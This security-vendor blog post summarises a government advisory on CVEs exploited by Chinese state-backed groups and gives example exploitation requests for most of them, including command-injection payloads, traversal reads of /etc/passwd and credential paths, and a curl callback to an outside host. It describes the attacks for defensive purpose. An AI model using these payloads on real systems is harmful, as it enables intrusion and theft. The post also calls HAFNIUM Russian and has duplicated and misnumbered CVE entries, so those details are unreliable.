Top Vulnerabilities Actively Exploited by Chinese State-Sponsored APT Actors

Keep up to date with latest blog posts

CISA (Cybersecurity and Infrastructure Security Agency) issued a joint advisory with the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA) on top vulnerabilities actively exploited by Chinese state-sponsored cyber threat actors. The vulnerabilities are often abused in cyber espionage and data exfiltration campaigns against US-based organizations, especially critical infrastructure such as Defense Industrial Base Sector organizations and telecommunications providers. Picus Labs advises organizations to patch their vulnerable assets to the latest stable versions as soon as possible. 

In this blog post, we explained these top vulnerabilities and how threat actors abuse them in their attack campaigns.

Simulate Top Vulnerabilities with 14-Day Free Trial of Picus Platform

List of Top Vulnerabilities Exploited by Chinese APT Actors

Vendor

CVE Number

CVSS Score

Vulnerability Type

Apache Log4j

CVE-2021-44228

10.0 Critical

Remote Code Execution

Pulse Connect Secure

CVE-2019-11510

10.0 Critical

Arbitrary File Read

GitLab CE/EE

CVE-2021-22205

10.0 Critical

Remote Code Execution

Atlassian Confluence Server and Data Center

CVE-2022-26134

9.8 Critical

Remote Code Execution

Microsoft Exchange

CVE-2021-26855

9.8 Critical

Remote Code Execution

F5 BIG-IP

CVE-2020-5902

9.8 Critical

Remote Code Execution

VMware vCenter Server

CVE-2021-22005

9.8 Critical

Arbitrary File Upload 

Citrix ADC

CVE-2019-19781

9.8 Critical

Path Traversal

Cisco Hyperflex

CVE-2021-1497

9.8 Critical

Command Line Execution

Buffalo WSR

CVE-2021-20090

9.8 Critical

Relative Path Traversal

Atlassian Confluence Server and Data Center

CVE-2021-26084

9.8 Critical

Remote Code Execution

Hikvision Web Server

CVE-2021-36260

9.8 Critical

Command Injection

Sitecore XP

CVE-2021-42237

9.8 Critical

Remote Code Execution

F5 BIG-IP

CVE-2022-1388

9.8 Critical

Remote Code Execution

Apache

CVE-2022-24112

9.8 Critical

Authentication Bypass

ZOHO

CVE-2021-40539

9.8 Critical

Remote Code Execution

Microsoft

CVE-2021-26857

7.8 High

Remote Code Execution

Microsoft

CVE-2021-26858

7.8 High

Remote Code Execution

Microsoft

CVE-2021-27065

7.8 High

Remote Code Execution

Apache HTTP Server

CVE-2021-41773

7.5 High

Path Traversal

Top CVEs Actively Exploited by Chinese State-Sponsored Threat Actors

Exploiting vulnerabilities in public-facing applications and services is among the top 3 initial access techniques used by adversaries, along with phishing and compromised credentials. According to CISA's advisory, Chinese state-sponsored threat actors often exploit vulnerabilities in public-facing assets of US-based organizations for their cyber espionage and data exfiltration attacks. The MITRE ATT&CK framework categorizes this adversary technique as "T1190 Exploit Public-Facing Application".

Since this is a major initial access vector, Picus recommends organizations test their security posture against vulnerability exploitation attacks and mitigate identified security gaps with the security control validation approach. 

Picus Labs has created a threat template for these vulnerabilities that you can test your security controls swiftly.

1. Apache Log4j Remote Code Execution Vulnerability

CVE Number: CVE-2021-44228
CVSS Score: 10.0 Critical
Date of Discovery: December 2021

Apache Log4j is a popular Java library used as a Java logging framework by many commercial and open-source software products worldwide. It is hard to estimate how many applications use the Log4j library; however, the number of users that encounter Log4j is well over millions.

Due to its widespread use, a remote code execution vulnerability found in the Log4j made headlines in the security community and became one of the most exploited vulnerabilities among cyber threat actors. 

For more detailed information, you can check our blog posts on Apache Log4j CVE-2021-44228 vulnerability.

2. Pulse Connect Secure Arbitrary File Read Vulnerability

CVE Number: CVE-2019-11510
CVSS Score: 10.0 Critical
Date of Discovery: May 2019

Pulse Connect Secure is a commonly used SSL VPN solution from Pulse Secure. At the time of the CVE-2019-11510 arbitrary file read vulnerability's discovery, Pulse Connect Secure was installed on more than 42,000 endpoints.

The vulnerability allows an unauthorized user to read files stored in a vulnerable device, including credentials, configuration files, and other sensitive data. Since valid credentials are a great way to access a target device, adversaries often read cached plaintext credentials stored in "/data/runtime/mtmp/lmdb/dataa/data.mdb". If attackers are not able to find cached credentials, they try to extract credentials from "/data/runtime/mtmp/system" where a list of users and hashed passwords are stored.

When exploited in combination with the CVE-2019-11539 command injection vulnerability, the CVE-2019-11510 arbitrary file read vulnerability poses a great risk to vulnerable networks.

3. GitLab CE/EE Remote Code Execution Vulnerability

CVE Number: CVE-2021-22205
CVSS Score: 10.0 Critical
Date of Discovery: April 2021

In April 2021, GitLab published a patch to fix a critical remote code execution vulnerability. At first sight, the vulnerability was thought to be exploitable by an authenticated user. However, further investigation showed that an unauthenticated attacker could also run arbitrary commands, and as a result, the CVSS score of the CVE-2021-22205 was increased from 9.9 Critical to 10.0 Critical.

To exploit the vulnerability, adversaries first need to create a malicious image file that contains the code to be executed. When the malicious file is uploaded to Gitlab, the ExifTool mishandles the file and causes command execution. Due to the simplicity and impact of the exploitation, the vulnerability was given a CVSS score of 10.0 Critical.

4. Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability

CVE Number: CVE-2022-26134
CVSS Score: 9.8 Critical
Date of Discovery: June 2022

At the beginning of June 2022, Atlassian released a security advisory on a critical remote code execution vulnerability affecting Atlassian Confluence Server and Data Center. The vulnerability allowed an unauthenticated attacker to execute arbitrary commands via OGNL injection. 

Adversaries send their malicious payload via an HTTP GET request and wait for a response in the "X-Cmd-Response" header. An example of CVE-2022-26134 vulnerability exploitation is given below.

Example 1: CVE-2022-26134 vulnerability exploitation [1]

5. Microsoft Exchange Remote Code Execution Vulnerabilities

CVE Number: CVE-2021-26855
CVSS Score: 9.8 Critical
Date of Discovery: March 2021

CVE Number: CVE-2021-26857
CVSS Score: 7.8 High
Date of Discovery: March 2021

CVE Number: CVE-2021-26858
CVSS Score: 7.8 High
Date of Discovery: March 2021

CVE Number: CVE-2021-27065
CVSS Score: 7.8 High
Date of Discovery: March 2021

Microsoft Exchange Server is one of the most popular email and calendaring services and has a market share of nearly 33%. Back in March 2021, a Russian APT group called HAFNIUM was observed to exploit several zero-day vulnerabilities found in Microsoft Exchange. These vulnerabilities made the vulnerability list in the CISA's advisory. These are CVE-2021-26855 (5th place), CVE-2021-26858 (17th place), CVE-2021-26858 (18th place), and CVE-2021-27065 (19th place).

The CVE-2021-26855 is a Server-Side Request Forgery (SSRF) type vulnerability that attackers abuse to bypass authentication and impersonate legitimate users.

GET /owa/auth/x.js HTTP/1.1
...
"Cookie": "X-AnonResource=true; X-AnonResource-Backend=127.0.0.1/ecp/default.flt?~3;

X-BEResource=127.0.0.1/owa/auth/logon.aspx?~3;"
...

Example 2: CVE-2021-26855 vulnerability exploitation [2]

CVE-2021-26857 is an insecure deserialization vulnerability that can be abused for arbitrary code execution. However, exploitation works if the vulnerable Exchange server has the Unified Messaging role installed and configured beforehand.

CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file write vulnerabilities that cyber threat actors use to write a file to any path on the vulnerable server. Adversaries often abuse them to upload webshells to public-facing folders. Since these vulnerabilities require authentication for exploitation, threat actors use them in combination with the CVE-2021-26855 SSRF vulnerability.

Check out our previous blog post for more information on how HAFNIUM exploits CVE-2021-26885, CVE-2021-26858, CVE-2021-27065, and other Microsoft Exchange vulnerabilities.

6. F5 BIG-IP Remote Code Execution Vulnerability

CVE Number: CVE-2020-5902
CVSS Score: 9.8 Critical
Date of Discovery: July 2020

F5 products are commonly used by large enterprises. In fact, 48 of the Fortune 50 companies use F5 products. The remote code execution vulnerability found in the F5 BIG-IP's Traffic Management User Interface (TMUI) allows unauthenticated attackers to run arbitrary commands through the BIG-IP management port or self-IPs. The vulnerability affects BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT), BIG-IQ Centralized Management, and Traffix SDC products.

https://<vulnerable_product's_IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Example 3: CVE-2020-5902 vulnerability exploitation [3]

7. VMware vCenter Server Arbitrary File Upload Vulnerability

CVE Number: CVE-2021-22005
CVSS Score: 9.8 Critical
Date of Discovery: September 2021

VMware vCenter Server is the centralized management utility used to manage multiple virtual machines and ESXİ hosts from a single console. Although it is not mandatory, many organizations worldwide use vCenter Server to manage their environments.

In September 2021, an arbitrary file upload vulnerability was found in the vCenter Server. Unauthenticated adversaries with access to port 443 on the vCenter Server may abuse this vulnerability to upload files. This vulnerability can also be exploited to lead to remote code execution.

curl -kv "https://<vulnerable_vCenter_Server's_IP>/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root <malicious_command>"

Example 4: Adding malicious scheduled task via CVE-2021-22005 vulnerability exploitation [4]

8. Citrix ADC and Gateway Path Traversal Vulnerability

CVE Number: CVE-2019-19781
CVSS Score: 9.8 Critical
Date of Discovery: December 2019

Many organizations use application delivery controllers (ADCs) as advanced load balancers to enhance the performance of applications they serve to their customers and employees. Organizations also use gateways to connect different networks, and gateways act as entry and exit points between networks.

A path traversal vulnerability was found in popular Citrix products, Citrix ADC (formerly known as NetScaler ADC) and Citrix Gateway (formerly known as NetScaler Gateway). This vulnerability allows unauthenticated attackers to read and write files to vulnerable devices via HTTP GET and POST requests. When combined with Perl Templating Toolkit, CVE-2019-19781 vulnerability can lead to remote code execution.

GET /page321318/vpn/../vpns/cfg/smb.conf HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Close

Example 5: Unauthorized file read via CVE-2019-19781 vulnerability exploitation

POST /page311195/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
NSC_USER: /../../../../../../../../../../netscaler/portal/templates/test
NSC_NONCE: test
Connection: Close
Content-Length: 155
url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'ls | tee /netscaler/portal/templates/output.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Example 6: Unauthorized file write via CVE-2019-19781 vulnerability exploitation

9. Cisco Hyperflex Command Line Execution Vulnerability

CVE Number: CVE-2021-1497
CVSS Score: 9.8 Critical
Date of Discovery: May 2021

Cisco HyperFlex HX Data Platform is a distributed file system that helps organizations manage their data distributed to multiple networks and cloud infrastructures. Due to its extensive reach, the CVE-2021-1497 remote code execution vulnerability poses a significant risk to organizations with vulnerable services. 

CVE-2021-1497 vulnerability allows a remote unauthenticated adversary to execute arbitrary commands by sending malicious web requests to Cisco HyperFlex's web-based management interface. 

curl -v http://<vulnerable_hyperflex's_IP>/storfs-asup -d 'action=&token=`id`&mode=`id`'

Example 7: CVE-2021-1497 vulnerability exploitation

10. Buffalo WSR Relative Path Traversal Vulnerability

CVE Number: CVE-2021-20090
CVSS Score: 9.8 Critical
Date of Discovery: April 2021

Arcadyan is one of the largest manufacturers of WLAN products. Their consumer-grade Buffalo routers are used by millions of home users. A path traversal vulnerability found in firmware from Arcadyan affects Buffalo routers and IoT devices. Adversaries can abuse CVE-2021-20090 vulnerability to access sensitive files, bypass authentication, or execute arbitrary commands on vulnerable devices.

GET /page419881/images/..%2finfo.html HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://example.com/info.html

Example 8: CVE-2021-20090 vulnerability exploitation

11. Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability

CVE Number: CVE-2021-26084
CVSS Score: 9.8 Critical
Date of Discovery: August 2021

Java is the underlying technology for many Confluence software, and OGNL (Object-Graph Navigation Language) is a scripting language that can interact with Java code. An OGNL injection vulnerability found in Atlassian Confluence Server and Confluence Data Center can be abused by unauthenticated adversaries to execute arbitrary commands. 

Cyber threat actors are able to exploit the CVE-2021-26084 vulnerability if the "Allow people to sign up to create their account" option located in COG > User Management > User Signup Options' is enabled in the vulnerable services. 

For more detailed information, please check our blog post on "Simulating and Preventing Atlassian Confluence CVE-2021-26084 Exploit".

POST /page367678/pages/createpage-entervariables.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 212
queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl test.burpcollaborator.net\u0022)}%2b\u0027

Example 9: CVE-2021-26084 vulnerability exploitation

12. Hikvision Web Server Command Injection Vulnerability

CVE Number: CVE-2021-36260
CVSS Score: 9.8 Critical
Date of Discovery: September 2021

Hikvision is a Chinese state-owned video surveillance equipment manufacturer, and its products are used for civilian and military purposes worldwide. A command injection vulnerability affecting Hikvision cameras was found in September 2021. The CVE-2021-36260 is a zero-click remote code execution vulnerability that allows unauthenticated attackers to gain unrestricted root-level access to vulnerable Hikvision products.

Although the vulnerability was discovered a year ago, nearly 80000 cameras remain unpatched in more than 2300 organizations across over 100 countries [5].

PUT /SDK/webLanguage HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8

<?xml version="1.0" encoding="UTF-8"?><language>$(whoami>webLib/x)</language>

Example 10: CVE-2021-36260 vulnerability exploitation

13. Sitecore XP Remote Code Execution Vulnerability

CVE Number: CVE-2021-42237
CVSS Score: 9.8 Critical
Date of Discovery: November 2021

Sitecore XP is an enterprise content management system (CMS) that is used by many Fortune 500 companies. In November 2021, security researchers discovered that an unauthenticated adversary could execute arbitrary commands via an insecure deserialization attack. Due to the popularity of Sitecore XP and the risk posed by the vulnerability, CVE-2021-42237 vulnerability has a CVSS score of 9.8 Critical.

Organizations that use Sitecore XP are advised to patch it to version 9.0 or higher. The vulnerability is caused by  insecure deserialization in "Report.ashx" file. Thus, as an alternative mitigation method, security teams can delete Report.ashx file from

"/sitecore/shell/ClientBin/Reporting/Report.ashx" on all server instances. 

A proof of concept for exploitation of CVE-2021-42237 vulnerability can be seen here.

14. F5 BIG-IP Remote Code Execution Vulnerability

CVE Number: CVE-2022-1388
CVSS Score: 9.8 Critical
Date of Discovery: May 2022

On May 4th, 2022, F5 Networks announced a security advisory on CVE-2022-1388 remote code execution vulnerability found in F5 BIG-IP. The vulnerable version of F5 BIG-IP has a feature that allows unauthenticated users to execute commands as root user via "/mgmt/tm/util/bash" service. Since the feature does not require authentication, adversaries with network access can run arbitrary commands remotely with elevated privileges.

As we mentioned in the CVE-2020-5902 vulnerability previously, F5 products are commonly used by large enterprises. Due to the widespread use of the F5 BIG-IP product, the CVE-2022-1388 has a CVSS score of 9.8 Critical.

For more detailed information, please check our blog post on CVE-2022-1388.

POST /mgmt/tm/util/bash HTTP/1.1
Host: <IP_of_target_f5_product>:8443
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host
X-Forwarded-For: localhost
Content-Length: 0

{"command": "run" , "utilCmdArgs": " -c 'whoami' " }

Example 11: CVE-2022-1388 vulnerability exploitation

15. Apache APISIX Authentication Bypass Vulnerability

CVE Number: CVE-2022-24112
CVSS Score: 9.8 Critical
Date of Discovery: February 2022

Apache APISIX is an open-source API gateway that can be used for load balancing, rate limiting, dynamic upstream, canary release, fine-grained routing, and many other applications. Since it is a gateway to many features, an authentication bypass vulnerability poses a great risk to organizations.

In default Apache APISIX configurations, adversaries may exploit the CVE-2022-24112 vulnerability to bypass the IP restriction of Admin API and execute arbitrary commands. While changing the default Admin API key or port may reduce the impact, a bug in the batch-requests plugin leads to an IP restriction bypass.

POST /apisix/batch-requests HTTP/1.1
Host: <vulnerable_APISIX's_IP>:9080
Content-Length: 427
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"headers":{"X-Real-IP":"localhost","Content-Type":"application/json"},"timeout":500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"service_id\":\"100\"\r\n,\r\n\"filter_func\": \"function(vars) os.execute('<malicious_command>'); return true end\"}"}]}

Example 12: CVE-2022-24112 vulnerability exploitation

16. ZOHO ManageEngine ADSelfService Plus Remote Code Execution Vulnerability

CVE Number: CVE-2021-40539
CVSS Score: 9.8 Critical
Date of Discovery: September 2021

ZOHO ManageEngine is an enterprise-grade application management technology used by more than 40000 organizations worldwide. Nearly 60% of Fortune 500 companies use ManageEngine. 

In September 2021, security researchers found that ManageEngine ADSelfService Plus version 6113 and prior versions are vulnerable to REST API authentication bypass, which can be exploited for remote code execution. Since ADSelfService Plus is a password management and single sign-on solution, the vulnerability may cause significant disruption in organizations with unpatched ADSelfService Plus.

POST /page814170/./RestAPI/LogonCustomization HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 27

methodToCall=previewMobLogo

Example 13: CVE-2021-40539 vulnerability exploitation

20. Apache HTTP Server Path Traversal Vulnerability

CVE Number: CVE-2021-41773
CVSS Score: 7.5 High
Date of Discovery: October 2021

In October 2021, Apache released an advisory on a vulnerability caused by a bug in path normalization in Apache HTTP server version 2.4.49. Cyber threat actors may exploit this vulnerability for path traversal attacks and access files outside the directories of the webserver. The unauthorized file read requests may succeed if files outside the document root are not protected by "require all denied".

CVE-2021-41773 vulnerability only affects version 2.4.49, and it has been a known and patched vulnerability for a long time. Organizations are advised to update their vulnerable services as soon as possible.

In our previous blog post, you can learn more about "Apache CVE-2021-41773 Exploits".

References

[1] "GitHub - h3v0x/CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)," GitHub. [Online]. Available: https://github.com/h3v0x/CVE-2022-26134. [Accessed: Oct. 31, 2022]

[2] P. Labs, "Simulating and Preventing Cyber Attacks to Critical Infrastructure," Jan. 11, 2022. [Online]. Available: https://www.picussecurity.com/resource/blog/simulating-and-preventing-cyber-attacks-critical-infrastructure. [Accessed: Oct. 31, 2022]

[3] "GitHub - yasserjanah/CVE-2020-5902: exploit code for F5-Big-IP (CVE-2020-5902)," GitHub. [Online]. Available: https://github.com/yasserjanah/CVE-2020-5902. [Accessed: Oct. 31, 2022]

[4] "[No title]," Twitter. [Online]. Available: https://twitter.com/. [Accessed: Oct. 31, 2022]

[5] S. Wadhwani, "80,000 Hikvision Cameras Still Vulnerable to a Year-old Command Injection Vulnerability |," Aug. 24, 2022. [Online]. Available: https://www.spiceworks.com/it-security/vulnerability-management/news/hikvision-camera-command-injection-vulnerability/. [Accessed: Oct. 31, 2022]

Subscribe

Keep up to date with latest blog posts